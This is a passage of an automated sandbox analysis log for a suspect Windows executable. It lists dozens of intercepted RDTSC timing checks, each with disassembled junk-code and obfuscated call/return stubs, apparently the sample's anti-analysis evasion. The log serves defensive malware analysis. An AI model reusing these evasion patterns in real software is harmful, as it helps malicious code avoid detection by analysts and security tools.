              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC839 second address: 6CC83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC83F second address: 6CC843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CA980 second address: 6CA984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CAEA6 second address: 6CAEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0D9Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FCD7C4F0D96h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CAEBD second address: 6CAEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB01F second address: 6CB027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB027 second address: 6CB034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FCD7D2AFB12h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB034 second address: 6CB042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCD7C4F0D96h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB042 second address: 6CB046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB046 second address: 6CB064 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCD7C4F0DA1h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB064 second address: 6CB06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB06D second address: 6CB071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB071 second address: 6CB08A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCD7D2AFB06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FCD7D2AFB08h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB1E1 second address: 6CB1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FCD7C4F0D96h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB50C second address: 6CB518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB668 second address: 6CB66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CB66C second address: 6CB670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6C0749 second address: 6C0755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FCD7C4F0D96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6C0755 second address: 6C0772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB19h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC18C second address: 6CC195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC195 second address: 6CC19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC19B second address: 6CC19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC19F second address: 6CC1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FCD7D2AFB0Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCD7D2AFB11h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC1CC second address: 6CC1DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC1DA second address: 6CC1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC1E0 second address: 6CC1E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC389 second address: 6CC3BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7D2AFB06h 0x00000008 jl 00007FCD7D2AFB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FCD7D2AFB17h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC3BC second address: 6CC3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FCD7C4F0D9Ch 0x0000000e jnc 00007FCD7C4F0D96h 0x00000014 push ecx 0x00000015 je 00007FCD7C4F0D96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D2602 second address: 6D2617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 699E63 second address: 699E6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D6C04 second address: 6D6C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D6C0C second address: 6D6C12 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D63E3 second address: 6D6405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB18h 0x00000007 ja 00007FCD7D2AFB12h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D89B0 second address: 6D89CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jns 00007FCD7C4F0DA4h 0x00000014 pushad 0x00000015 jp 00007FCD7C4F0D96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8A8C second address: 6D8ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007FCD7D2AFB11h 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8ABF second address: 6D8AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8AC5 second address: 6D8AE1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 js 00007FCD7D2AFB06h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E68 second address: 6D8E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E6F second address: 6D8E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FCD7D2AFB06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E83 second address: 6D8E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E87 second address: 6D8E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9087 second address: 6D908D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D908D second address: 6D9096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D91BD second address: 6D91C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D925C second address: 6D9275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FCD7D2AFB06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FCD7D2AFB08h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9275 second address: 6D927A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9C2F second address: 6D9C35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9C35 second address: 6D9C3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9C3A second address: 6D9C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCD7D2AFB0Eh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9CCE second address: 6D9CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007FCD7C4F0D9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9CDE second address: 6D9CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DAC76 second address: 6DAD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FCD7C4F0D9Ch 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FCD7C4F0D98h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FCD7C4F0D98h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ecx 0x0000004c call 00007FCD7C4F0D98h 0x00000051 pop ecx 0x00000052 mov dword ptr [esp+04h], ecx 0x00000056 add dword ptr [esp+04h], 0000001Ah 0x0000005e inc ecx 0x0000005f push ecx 0x00000060 ret 0x00000061 pop ecx 0x00000062 ret 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FCD7C4F0DA0h 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DBE99 second address: 6DBE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB53E second address: 6DB552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DBE9D second address: 6DBEA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB552 second address: 6DB56B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DBEA3 second address: 6DBF10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FCD7D2AFB08h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 or edi, dword ptr [ebp+1247323Ah] 0x0000002c push 00000000h 0x0000002e mov esi, dword ptr [ebp+122D3227h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FCD7D2AFB08h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007FCD7D2AFB08h 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB56B second address: 6DB570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB570 second address: 6DB588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB14h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DDD2A second address: 6DDDAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FCD7C4F0DA0h 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FCD7C4F0D9Ch 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FCD7C4F0D98h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D281Fh], ecx 0x00000038 push 00000000h 0x0000003a mov edi, 514D4255h 0x0000003f xchg eax, ebx 0x00000040 js 00007FCD7C4F0D9Eh 0x00000046 push eax 0x00000047 je 00007FCD7C4F0D96h 0x0000004d pop eax 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 js 00007FCD7C4F0DADh 0x00000057 jmp 00007FCD7C4F0DA7h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DDDAC second address: 6DDDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF8E5 second address: 6DF8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF8EB second address: 6DF8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCD7D2AFB06h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF8FB second address: 6DF915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FCD7C4F0D9Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF915 second address: 6DF93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jc 00007FCD7D2AFB37h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7D2AFB19h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF71 second address: 6DFF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF75 second address: 6DFF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF7B second address: 6DFF8E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCD7C4F0D98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF8E second address: 6DFF98 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF98 second address: 6E0000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, edx 0x0000000c push 00000000h 0x0000000e jmp 00007FCD7C4F0DA0h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FCD7C4F0D98h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov di, ax 0x00000032 mov dword ptr [ebp+122D2F74h], ecx 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c js 00007FCD7C4F0D96h 0x00000042 pop edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E0000 second address: 6E0005 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DD1EE second address: 6DD1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DD1F6 second address: 6DD204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DE62C second address: 6DE630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DE630 second address: 6DE636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E6488 second address: 6E6498 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E6498 second address: 6E6516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Eh 0x00000009 popad 0x0000000a pop ebx 0x0000000b nop 0x0000000c jc 00007FCD7D2AFB09h 0x00000012 adc bl, 00000043h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FCD7D2AFB08h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov bl, cl 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D3257h], edx 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d jmp 00007FCD7D2AFB18h 0x00000042 pushad 0x00000043 push esi 0x00000044 pop esi 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FCD7D2AFB14h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E7415 second address: 6E7429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FCD7C4F0D96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
